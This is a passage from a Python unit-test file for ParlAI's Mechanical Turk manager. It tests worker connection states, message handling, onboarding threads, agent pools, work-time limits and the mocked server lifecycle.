)
manager.opt['allowed_conversations'] = 1
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test uniqueness failed
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.is_unique = True
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test in task reconnects
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test all final states
for use_state in [
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_DONE,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
AssignState.STATUS_PARTNER_DISCONNECT,
]:
manager.send_command = mock.MagicMock()
agent.set_status(use_state)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.send_command.assert_called_once()
def test_mturk_messages(self):
"""
Ensure incoming messages work as expected.
"""
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._on_socket_dead = mock.MagicMock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
agent.set_hit_is_abandoned = mock.MagicMock()
# Test SNS_ASSIGN_ABANDONDED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_ABANDONDED},
'',
)
manager._handle_mturk_message(message_packet)
agent.set_hit_is_abandoned.assert_called_once()
agent.set_hit_is_abandoned.reset_mock()
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
# Test SNS_ASSIGN_RETURNED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_RETURNED},
'',
)
agent.hit_is_returned = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
self.assertTrue(agent.hit_is_returned)
# Test SNS_ASSIGN_SUBMITTED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
agent.hit_is_complete = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_not_called()
self.assertTrue(agent.hit_is_complete)
def test_new_message(self):
"""
test on_new_message.
"""
alive_packet = Packet(
'',
TEST_WORKER_ID_1,
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
message_packet = Packet(
'',
'',
MTurkManagerFile.AMAZON_SNS_NAME,
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
manager = self.mturk_manager
manager._handle_mturk_message = mock.MagicMock()
manager.worker_manager.route_packet = mock.MagicMock()
# test mturk message
manager._on_new_message(alive_packet)
manager._handle_mturk_message.assert_not_called()
manager.worker_manager.route_packet.assert_called_once_with(alive_packet)
manager.worker_manager.route_packet.reset_mock()
# test non-mturk message
manager._on_new_message(message_packet)
manager._handle_mturk_message.assert_called_once_with(message_packet)
manager.worker_manager.route_packet.assert_not_called()
@testing_utils.retry()
def test_onboarding_function(self):
manager = self.mturk_manager
manager.onboard_function = mock.MagicMock()
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager._move_agents_to_waiting = mock.MagicMock()
manager.worker_manager.get_agent_for_assignment = mock.MagicMock(
return_value=self.agent_1
)
onboard_threads = manager.assignment_to_onboard_thread
did_launch = manager._onboard_new_agent(self.agent_1)
        assert_equal_by(onboard_threads[self.agent_1.assignment_id].is_alive, True, 0.2)
time.sleep(0.1)
manager.worker_manager.change_agent_conversation.assert_called_once()
manager.worker_manager.change_agent_conversation.reset_mock()
manager.onboard_function.assert_not_called()
self.assertTrue(did_launch)
# Thread will be waiting for agent_1 status to go to ONBOARDING, ensure
# won't start new thread on a repeat call when first still alive
did_launch = manager._onboard_new_agent(self.agent_1)
time.sleep(0.2)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.worker_manager.get_agent_for_assignment.assert_not_called()
manager.onboard_function.assert_not_called()
self.assertFalse(did_launch)
# Advance the worker to simulate a connection, assert onboarding goes
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
        assert_equal_by(onboard_threads[self.agent_1.assignment_id].is_alive, False, 0.6)
manager.onboard_function.assert_called_with(self.agent_1)
manager._move_agents_to_waiting.assert_called_once()
# Try to launch a new onboarding world for the same agent still in
# onboarding, assert that this call is ignored.
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertFalse(did_launch)
# Try to launch with an agent that was in none but supposedly launched
# before
self.agent_1.set_status(AssignState.STATUS_NONE)
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertTrue(did_launch)
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
def test_agents_incomplete(self):
agents = [self.agent_1, self.agent_2, self.agent_3]
manager = self.mturk_manager
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_2.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_DONE)
self.assertTrue(manager._no_agents_incomplete(agents))
def test_world_types(self):
onboard_type = 'o_12345'
waiting_type = 'w_12345'
task_type = 't_12345'
garbage_type = 'g_12345'
manager = self.mturk_manager
self.assertTrue(manager.is_onboarding_world(onboard_type))
self.assertTrue(manager.is_task_world(task_type))
self.assertTrue(manager.is_waiting_world(waiting_type))
for world_type in [waiting_type, task_type, garbage_type]:
self.assertFalse(manager.is_onboarding_world(world_type))
for world_type in [onboard_type, task_type, garbage_type]:
self.assertFalse(manager.is_waiting_world(world_type))
for world_type in [waiting_type, onboard_type, garbage_type]:
self.assertFalse(manager.is_task_world(world_type))
def test_turk_timeout(self):
"""
Timeout should send expiration message to worker and be treated as a disconnect
event.
"""
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
manager._handle_agent_disconnect = mock.MagicMock()
manager.handle_turker_timeout(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
manager.force_expire_hit.assert_called_once()
call_args = manager.force_expire_hit.call_args
self.assertEqual(call_args[0][0], TEST_WORKER_ID_1)
self.assertEqual(call_args[0][1], TEST_ASSIGNMENT_ID_1)
manager._handle_agent_disconnect.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
@testing_utils.retry()
def test_wait_for_task_expirations(self):
"""
Ensure waiting for expiration time actually works out.
"""
manager = self.mturk_manager
manager.opt['assignment_duration_in_seconds'] = 0.5
manager.expire_all_unassigned_hits = mock.MagicMock()
manager.hit_id_list = [1, 2, 3]
def run_task_wait():
manager._wait_for_task_expirations()
wait_thread = threading.Thread(target=run_task_wait, daemon=True)
wait_thread.start()
time.sleep(0.1)
        self.assertTrue(wait_thread.is_alive())
        assert_equal_by(wait_thread.is_alive, False, 0.6)
def test_mark_workers_done(self):
manager = self.mturk_manager
manager.give_worker_qualification = mock.MagicMock()
manager._log_working_time = mock.MagicMock()
manager.has_time_limit = False
# Assert finality doesn't change
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
manager.mark_workers_done([self.agent_1])
self.assertEqual(AssignState.STATUS_DISCONNECT, self.agent_1.get_status())
# assert uniqueness works as expected
manager.is_unique = True
with self.assertRaises(AssertionError):
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_not_called()
manager.unique_qual_name = 'fake_qual_name'
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_called_once_with(
self.agent_2.worker_id, 'fake_qual_name'
)
self.assertEqual(self.agent_2.get_status(), AssignState.STATUS_DONE)
manager.is_unique = False
# Ensure working time is called if it's set
manager.has_time_limit = True
manager.mark_workers_done([self.agent_3])
self.assertEqual(self.agent_3.get_status(), AssignState.STATUS_DONE)
manager._log_working_time.assert_called_once_with(self.agent_3)
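# Unit tests for the agent pool: adding, fetching, removing and expiring
# agents, plus eligibility functions and one-agent-per-worker uniqueness.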
class TestMTurkManagerPoolHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_pool_add_get_remove_and_expire(self):
"""
Ensure the pool properly adds and releases workers.
"""
all_are_eligible = {'multiple': True, 'func': lambda workers: workers}
manager = self.mturk_manager
# Test empty pool
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test pool add and get
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
manager._add_agent_to_pool(self.agent_3)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test extra add to pool has no effect
manager._add_agent_to_pool(self.agent_1)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test remove from the pool works:
manager._remove_from_agent_pool(self.agent_2)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible), [self.agent_1, self.agent_3]
)
# Test repeated remove fails
with self.assertRaises(AssertionError):
manager._remove_from_agent_pool(self.agent_2)
# Test eligibility function
second_worker_only = {'multiple': True, 'func': lambda workers: [workers[1]]}
self.assertListEqual(
manager._get_unique_pool(second_worker_only), [self.agent_3]
)
# Test single eligibility function
only_agent_1 = {
'multiple': False,
'func': lambda worker: worker is self.agent_1,
}
self.assertListEqual(manager._get_unique_pool(only_agent_1), [self.agent_1])
# Test expiration of pool
manager.force_expire_hit = mock.MagicMock()
manager._expire_agent_pool()
manager.force_expire_hit.assert_any_call(
self.agent_1.worker_id, self.agent_1.assignment_id
)
manager.force_expire_hit.assert_any_call(
self.agent_3.worker_id, self.agent_3.assignment_id
)
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test adding two agents from the same worker
self.agent_2.worker_id = self.agent_1.worker_id
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
# both workers are in the pool
self.assertListEqual(manager.agent_pool, [self.agent_1, self.agent_2])
# Only one worker per unique list though
manager.is_sandbox = False
self.assertListEqual(manager._get_unique_pool(all_are_eligible), [self.agent_1])
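# Unit tests for working-time tracking: resetting the time log, blocking
# workers that exceed max_time and unblocking everyone when the log resets.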
class TestMTurkManagerTimeHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager.time_limit_checked = time.time()
self.mturk_manager.worker_manager.un_time_block_workers = mock.MagicMock()
self.mturk_manager.worker_manager.time_block_worker = mock.MagicMock()
self.old_time = MTurkManagerFile.time
MTurkManagerFile.time = mock.MagicMock()
MTurkManagerFile.time.time = mock.MagicMock(return_value=0)
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
def tearDown(self):
self.mturk_manager.shutdown()
MTurkManagerFile.time = self.old_time
def test_create_work_time_file(self):
manager = self.mturk_manager
manager._should_use_time_logs = mock.MagicMock(return_value=True)
file_path = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_LOCK)
# No lock should exist already
self.assertFalse(os.path.exists(file_lock))
# open the work time file, ensure it was just updated
MTurkManagerFile.time.time = mock.MagicMock(return_value=42424242)
manager._reset_time_logs(force=True)
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
self.assertEqual(existing_times['last_reset'], 42424242)
self.assertEqual(len(existing_times), 1)
# Try to induce a check, ensure it doesn't fire because too recent
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Try to induce a check, ensure it doesn't fire because outside of 30
# minute window
MTurkManagerFile.time.time = mock.MagicMock(
return_value=(60 * 60 * 24 * 1000) + (60 * 40)
)
manager.time_limit_checked = 0
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Induce a check
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
self.assertEqual(manager.time_limit_checked, (60 * 60 * 24 * 1000))
def test_add_to_work_time_file_and_block(self):
manager = self.mturk_manager
self.agent_1.creation_time = 1000
self.agent_2.creation_time = 1000
manager.opt['max_time'] = 10000
# Ensure a worker below the time limit isn't blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=10000)
self.mturk_manager._should_use_time_logs = mock.MagicMock(return_value=True)
manager._log_working_time(self.agent_1)
manager.worker_manager.time_block_worker.assert_not_called()
# Ensure a worker above the time limit is blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=100000)
manager._log_working_time(self.agent_2)
manager.worker_manager.time_block_worker.assert_called_with(
self.agent_2.worker_id
)
# Ensure on a (forced) reset all workers are freed
manager._reset_time_logs(force=True)
manager.worker_manager.un_time_block_workers.assert_called_once()
args = manager.worker_manager.un_time_block_workers.call_args
worker_list = args[0][0]
self.assertIn(self.agent_1.worker_id, worker_list)
self.assertIn(self.agent_2.worker_id, worker_list)
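# Walks the full manager lifecycle: server setup, starting a run, accepting
# workers, creating HITs, running the task loop and shutting down cleanly.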
class TestMTurkManagerLifecycleFunctions(unittest.TestCase):
def setUp(self):
self.fake_socket = MockSocket()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['task_description'] = 'Test task description'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
MTurkManagerFile.server_utils.delete_server = mock.MagicMock()
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
@testing_utils.retry()
def test_full_lifecycle(self):
manager = self.mturk_manager
server_url = 'https://fake_server_url'
topic_arn = 'aws_topic_arn'
mturk_page_url = 'https://test_mturk_page_url'
MTurkManagerFile.server_utils.setup_server = mock.MagicMock(
return_value=server_url
)
MTurkManagerFile.server_utils.setup_legacy_server = mock.MagicMock(
return_value=server_url
)
# Currently in state created. Try steps that are too soon to work
with self.assertRaises(AssertionError):
manager.start_new_run()
with self.assertRaises(AssertionError):
manager.start_task(None, None, None)
        # Set up the server but fail due to insufficient funds
manager.opt['local'] = True
MTurkManagerFile.input = mock.MagicMock()
MTurkManagerFile.mturk_utils.setup_aws_credentials = mock.MagicMock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=False
)
MTurkManagerFile.mturk_utils.calculate_mturk_cost = mock.MagicMock(
return_value=10
)
with self.assertRaises(SystemExit):
manager.setup_server()
MTurkManagerFile.mturk_utils.setup_aws_credentials.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.input.assert_called()
        # Two calls to input if local is set
self.assertEqual(len(MTurkManagerFile.input.call_args_list), 2)
# Test successful setup
manager.opt['local'] = False
MTurkManagerFile.input.reset_mock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=True
)
MTurkManagerFile.mturk_utils.create_hit_config = mock.MagicMock()
manager.setup_server()
# Copy one file for cover page, 2 workers, and 1 onboarding
self.assertEqual(len(manager.task_files_to_copy), 4)
self.assertEqual(manager.server_url, server_url)
self.assertIn('unittest', manager.server_task_name)
MTurkManagerFile.input.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.mturk_utils.create_hit_config.assert_called_once()
self.assertEqual(manager.task_state, manager.STATE_SERVER_ALIVE)
# Start a new run
MTurkManagerFile.mturk_utils.setup_sns_topic = mock.MagicMock(
return_value=topic_arn
)
manager._init_state = mock.MagicMock(wraps=manager._init_state)
manager.start_new_run()
manager._init_state.assert_called_once()
MTurkManagerFile.mturk_utils.setup_sns_topic.assert_called_once_with(
manager.opt['task'], manager.server_url, manager.task_group_id
)
self.assertEqual(manager.topic_arn, topic_arn)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
# connect to the server
manager._setup_socket = mock.MagicMock()
manager.ready_to_accept_workers()
manager._setup_socket.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_ACCEPTING_WORKERS)
# 'launch' some hits
manager.create_additional_hits = mock.MagicMock(return_value=mturk_page_url)
hits_url = manager.create_hits()
manager.create_additional_hits.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_HITS_MADE)
self.assertEqual(hits_url, mturk_page_url)
# start a task
manager.num_conversations = 10
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
# Run a task, ensure it closes when the max convs have been 'had'
def run_task():
manager.start_task(lambda worker: True, None, None)
task_thread = threading.Thread(target=run_task, daemon=True)
task_thread.start()
        self.assertTrue(task_thread.is_alive())
manager.started_conversations = 10
manager.completed_conversations = 10
        assert_equal_by(task_thread.is_alive, False, 0.6)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
# shutdown
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
manager._wait_for_task_expirations = mock.MagicMock()
MTurkManagerFile.mturk_utils.delete_sns_topic = mock.MagicMock()
manager.shutdown()
self.assertTrue(manager.is_shutdown)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
manager._wait_for_task_expirations.assert_called_once()
MTurkManagerFile.server_utils.delete_server.assert_called_once()
MTurkManagerFile.mturk_utils.delete_sns_topic.assert_called_once_with(topic_arn)
class TestMTurkManagerConnectedFunctions(unittest.TestCase):
"""
Semi-unit semi-integration tests on the more state-dependent MTurkManager
functionality.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager._onboard_new_agent = mock.MagicMock()
self.mturk_manager._wait_for_task_expirations = mock.MagicMock()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_ACCEPTING_WORKERS
self.mturk_manager._setup_socket()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_2,
'hit_id': TEST_HIT_ID_2,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
self.agent_1 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_1
)
self.agent_2 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_2
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_socket_dead(self):
"""
Test all states of socket dead calls.
"""
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
manager.socket_manager.close_channel = mock.MagicMock()
agent.reduce_state = mock.MagicMock()
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._handle_agent_disconnect = mock.MagicMock(
wraps=manager._handle_agent_disconnect
)
# Test status none
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
manager._handle_agent_disconnect.assert_not_called()
# Test status onboarding
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
self.assertFalse(agent.disconnected)
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
# test status waiting
agent.disconnected = False
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
manager._remove_from_agent_pool.assert_called_once_with(agent)
# test status in task
agent.disconnected = False
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_called_once_with(
worker_id, assignment_id
)
# test status done
agent.disconnected = False
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager._handle_agent_disconnect.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertNotEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
self.assertFalse(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
def test_send_message_command(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = self.agent_1.worker_id
assignment_id = self.agent_1.assignment_id
agent.set_last_command = mock.MagicMock()
manager.socket_manager.queue_packet = mock.MagicMock()
# Send a command
data = {'text': data_model.COMMAND_SEND_MESSAGE}
manager.send_command(worker_id, assignment_id, data)
agent.set_last_command.assert_called_once_with(data)
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertEqual(packet.data, data)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_COMMAND)
# Send a message
data = {'text': 'This is a test message'}
agent.set_last_command.reset_mock()
manager.socket_manager.queue_packet.reset_mock()
message_id = manager.send_message(worker_id, assignment_id, data)
agent.set_last_command.assert_not_called()
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertNotEqual(packet.data, data)
self.assertEqual(data['text'], packet.data['text'])
self.assertEqual(packet.data['message_id'], message_id)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_MESSAGE)
def test_free_workers(self):
manager = self.mturk_manager
manager.socket_manager.close_channel = mock.MagicMock()
manager.free_workers([self.agent_1])
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
def test_force_expire_hit(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
socket_manager = manager.socket_manager
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
# Test expiring finished worker
agent.set_status(AssignState.STATUS_DONE)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_not_called()
socket_manager.close_channel.assert_not_called()
self.assertEqual(agent.get_status(), AssignState.STATUS_DONE)
# Test expiring not finished worker with default args
agent.set_status(AssignState.STATUS_ONBOARDING)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertIsNotNone(data['inactive_text'])
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
# Test expiring not finished worker with custom arguments
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.hit_is_expired = False
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
special_disconnect_text = 'You were disconnected as part of a test'
test_ack_function = mock.MagicMock()
manager.force_expire_hit(
worker_id,
assignment_id,
text=special_disconnect_text,
ack_func=test_ack_function,
)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
